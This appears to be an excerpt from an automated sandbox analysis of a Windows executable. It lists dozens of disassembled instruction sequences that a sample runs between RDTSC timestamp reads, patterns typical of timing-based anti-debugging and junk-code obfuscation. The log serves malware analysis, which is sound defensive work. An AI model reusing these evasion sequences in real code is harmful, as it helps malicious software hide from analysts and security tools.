Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EA1C7 second address: 12EA252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F1548D0B2F8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 add bx, E491h 0x00000028 or di, 4C23h 0x0000002d xor bl, 0000003Bh 0x00000030 push dword ptr fs:[00000000h] 0x00000037 push 00000000h 0x00000039 push ecx 0x0000003a call 00007F1548D0B2F8h 0x0000003f pop ecx 0x00000040 mov dword ptr [esp+04h], ecx 0x00000044 add dword ptr [esp+04h], 00000018h 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e ret 0x0000004f pop ecx 0x00000050 ret 0x00000051 mov ebx, dword ptr [ebp+122D2AA9h] 0x00000057 mov dword ptr fs:[00000000h], esp 0x0000005e xor edi, 125B18F5h 0x00000064 mov eax, dword ptr [ebp+122D1175h] 0x0000006a mov ebx, dword ptr [ebp+122D2107h] 0x00000070 push FFFFFFFFh 0x00000072 mov bh, DEh 0x00000074 xor dword ptr [ebp+1245B37Bh], esi 0x0000007a nop 0x0000007b push ecx 0x0000007c pushad 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EB2E7 second address: 12EB2EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EA252 second address: 12EA258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EC209 second address: 12EC28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007F15490E9B97h 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F15490E9B91h 0x00000012 nop 0x00000013 mov bx, dx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007F15490E9B88h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007F15490E9B88h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 00000019h 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push ebx 0x00000052 push edx 0x00000053 pop edx 0x00000054 pop ebx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EB2EB second address: 12EB2F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EB2F1 second address: 12EB306 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F15490E9B90h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12ED21B second address: 12ED287 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a xor ebx, dword ptr [ebp+122D2A11h] 0x00000010 mov bh, FAh 0x00000012 push 00000000h 0x00000014 pushad 0x00000015 pushad 0x00000016 sbb edx, 6ACAEBA2h 0x0000001c popad 0x0000001d jmp 00007F1548D0B308h 0x00000022 popad 0x00000023 push 00000000h 0x00000025 mov ebx, 07B2C260h 0x0000002a xchg eax, esi 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e jmp 00007F1548D0B302h 0x00000033 jmp 00007F1548D0B308h 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EC407 second address: 12EC48A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a xor di, 6D7Ch 0x0000000f jmp 00007F15490E9B93h 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push edi 0x0000001c push ebx 0x0000001d mov bl, 94h 0x0000001f pop edi 0x00000020 pop ebx 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push ebp 0x0000002b call 00007F15490E9B88h 0x00000030 pop ebp 0x00000031 mov dword ptr [esp+04h], ebp 0x00000035 add dword ptr [esp+04h], 0000001Ah 0x0000003d inc ebp 0x0000003e push ebp 0x0000003f ret 0x00000040 pop ebp 0x00000041 ret 0x00000042 mov edi, ebx 0x00000044 mov dword ptr [ebp+122D3031h], ebx 0x0000004a xor ebx, dword ptr [ebp+122D2A95h] 0x00000050 mov eax, dword ptr [ebp+122D0CA9h] 0x00000056 mov edi, eax 0x00000058 push FFFFFFFFh 0x0000005a mov bl, A8h 0x0000005c mov edi, dword ptr [ebp+122D2AE9h] 0x00000062 nop 0x00000063 jbe 00007F15490E9B90h 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c pop eax 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EE2B8 second address: 12EE2BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EE4AC second address: 12EE4CA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F15490E9B94h 0x00000010 jmp 00007F15490E9B8Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F0303 second address: 12F035A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D2A71h] 0x00000010 push 00000000h 0x00000012 pushad 0x00000013 mov dword ptr [ebp+122D201Ah], edx 0x00000019 popad 0x0000001a push 00000000h 0x0000001c call 00007F1548D0B308h 0x00000021 ja 00007F1548D0B2F8h 0x00000027 pop ebx 0x00000028 xchg eax, esi 0x00000029 push ebx 0x0000002a jno 00007F1548D0B2FCh 0x00000030 pop ebx 0x00000031 push eax 0x00000032 jl 00007F1548D0B304h 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F035A second address: 12F035E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EF4F6 second address: 12EF5AA instructions: 0x00000000 rdtsc 0x00000002 je 00007F1548D0B2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F1548D0B302h 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 xor ebx, dword ptr [ebp+122D2C79h] 0x0000001b push dword ptr fs:[00000000h] 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F1548D0B2F8h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 0000001Dh 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c movsx ebx, di 0x0000003f mov dword ptr fs:[00000000h], esp 0x00000046 push 00000000h 0x00000048 push ecx 0x00000049 call 00007F1548D0B2F8h 0x0000004e pop ecx 0x0000004f mov dword ptr [esp+04h], ecx 0x00000053 add dword ptr [esp+04h], 00000016h 0x0000005b inc ecx 0x0000005c push ecx 0x0000005d ret 0x0000005e pop ecx 0x0000005f ret 0x00000060 mov edi, ebx 0x00000062 mov eax, dword ptr [ebp+122D0E71h] 0x00000068 mov edi, dword ptr [ebp+1245C271h] 0x0000006e push FFFFFFFFh 0x00000070 add dword ptr [ebp+122D1BB1h], edi 0x00000076 nop 0x00000077 js 00007F1548D0B304h 0x0000007d push eax 0x0000007e push eax 0x0000007f push edx 0x00000080 jmp 00007F1548D0B2FAh 0x00000085 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 128D84A second address: 128D850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 128D850 second address: 128D859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F4CE3 second address: 12F4D04 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F15490E9B96h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F4D04 second address: 12F4D8F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1548D0B2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F1548D0B2F8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 adc ebx, 41FCFE11h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F1548D0B2F8h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 mov ebx, dword ptr [ebp+122D2C55h] 0x0000004e mov dword ptr [ebp+1245B36Dh], esi 0x00000054 push 00000000h 0x00000056 call 00007F1548D0B303h 0x0000005b adc bx, 50E7h 0x00000060 pop edi 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jc 00007F1548D0B2FCh 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F4D8F second address: 12F4D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F4D93 second address: 12F4D99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F3E7B second address: 12F3E7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F4F05 second address: 12F4F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F3E7F second address: 12F3E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F901C second address: 12F9021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F9021 second address: 12F9026 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F70B4 second address: 12F70B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F926C second address: 12F9270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F9270 second address: 12F9276 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12FE3BC second address: 12FE3D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1301F17 second address: 1301F41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B300h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007F1548D0B2FCh 0x00000010 push eax 0x00000011 jng 00007F1548D0B2F6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 130159B second address: 13015A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13015A7 second address: 13015AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13016E9 second address: 1301709 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F15490E9B86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F15490E9B92h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1301709 second address: 130170D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1301896 second address: 13018A6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F15490E9B86h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13018A6 second address: 13018AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13018AC second address: 13018B2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13018B2 second address: 13018B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13018B7 second address: 13018D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F15490E9B90h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F15490E9B86h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13018D6 second address: 13018E0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1548D0B2F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 130C8E6 second address: 130C8F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F15490E9B86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1312AA8 second address: 1312AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1312AAE second address: 1312AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F15490E9B8Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12977AA second address: 12977AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 131193A second address: 131193E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 131193E second address: 1311942 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E5E28 second address: 12E5E2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E5F3E second address: 12E5F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E6316 second address: 12E6320 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F15490E9B86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E6426 second address: 12E642B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E642B second address: 12E643D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jo 00007F15490E9B86h 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E643D second address: 1121B24 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1548D0B2FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D3522h], ebx 0x00000011 push dword ptr [ebp+122D09C5h] 0x00000017 mov di, D0BFh 0x0000001b call dword ptr [ebp+122D3895h] 0x00000021 pushad 0x00000022 mov dword ptr [ebp+122D282Dh], eax 0x00000028 xor eax, eax 0x0000002a mov dword ptr [ebp+122D1FDFh], ebx 0x00000030 mov edx, dword ptr [esp+28h] 0x00000034 cmc 0x00000035 pushad 0x00000036 sub dword ptr [ebp+122D1FDFh], edi 0x0000003c movsx esi, bx 0x0000003f popad 0x00000040 mov dword ptr [ebp+122D2B15h], eax 0x00000046 sub dword ptr [ebp+122D285Bh], eax 0x0000004c mov esi, 0000003Ch 0x00000051 jmp 00007F1548D0B2FEh 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a mov dword ptr [ebp+122D282Dh], ecx 0x00000060 lodsw 0x00000062 cld 0x00000063 add eax, dword ptr [esp+24h] 0x00000067 mov dword ptr [ebp+122D1B96h], eax 0x0000006d mov ebx, dword ptr [esp+24h] 0x00000071 mov dword ptr [ebp+122D1B96h], eax 0x00000077 nop 0x00000078 pushad 0x00000079 push eax 0x0000007a jc 00007F1548D0B2F6h 0x00000080 pop eax 0x00000081 push eax 0x00000082 push edx 0x00000083 jmp 00007F1548D0B305h 0x00000088 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E64BD second address: 12E64C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E64C1 second address: 12E6526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jno 00007F1548D0B2F8h 0x0000000f jmp 00007F1548D0B307h 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push ebx 0x0000001a push edi 0x0000001b jo 00007F1548D0B2F6h 0x00000021 pop edi 0x00000022 pop ebx 0x00000023 mov eax, dword ptr [eax] 0x00000025 ja 00007F1548D0B30Eh 0x0000002b jmp 00007F1548D0B308h 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push edi 0x00000037 jne 00007F1548D0B2F6h 0x0000003d pop edi 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E677F second address: 12E6785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E687F second address: 12E6885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E6885 second address: 12E6889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E69C0 second address: 12E69C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E6DDF second address: 12E6E22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F15490E9B8Eh 0x00000011 nop 0x00000012 mov edx, dword ptr [ebp+122D289Bh] 0x00000018 push 0000001Eh 0x0000001a mov dx, B337h 0x0000001e nop 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F15490E9B99h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E6E22 second address: 12E6E3C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1548D0B2FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c ja 00007F1548D0B2FCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E7142 second address: 12E7146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E7146 second address: 12E7156 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1548D0B2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push ebx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E7233 second address: 12E7241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E7241 second address: 12E7294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F1548D0B304h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e popad 0x0000000f nop 0x00000010 xor dword ptr [ebp+122D1BFDh], edi 0x00000016 lea eax, dword ptr [ebp+12497B31h] 0x0000001c jmp 00007F1548D0B307h 0x00000021 jc 00007F1548D0B2F6h 0x00000027 nop 0x00000028 pushad 0x00000029 pushad 0x0000002a jl 00007F1548D0B2F6h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E7294 second address: 12E72A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F15490E9B86h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1311D77 second address: 1311D91 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1548D0B2F6h 0x00000008 jmp 00007F1548D0B2FCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1311D91 second address: 1311DC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F15490E9B96h 0x0000000d jl 00007F15490E9B9Dh 0x00000013 jmp 00007F15490E9B91h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1312634 second address: 1312638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1312638 second address: 131263E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13159EA second address: 1315A1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1548D0B309h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1548D0B301h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1315A1E second address: 1315A24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 131BBD4 second address: 131BC0D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1548D0B2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F1548D0B301h 0x00000012 jmp 00007F1548D0B301h 0x00000017 popad 0x00000018 jns 00007F1548D0B300h 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 131A7A2 second address: 131A7B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15490E9B8Ch 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
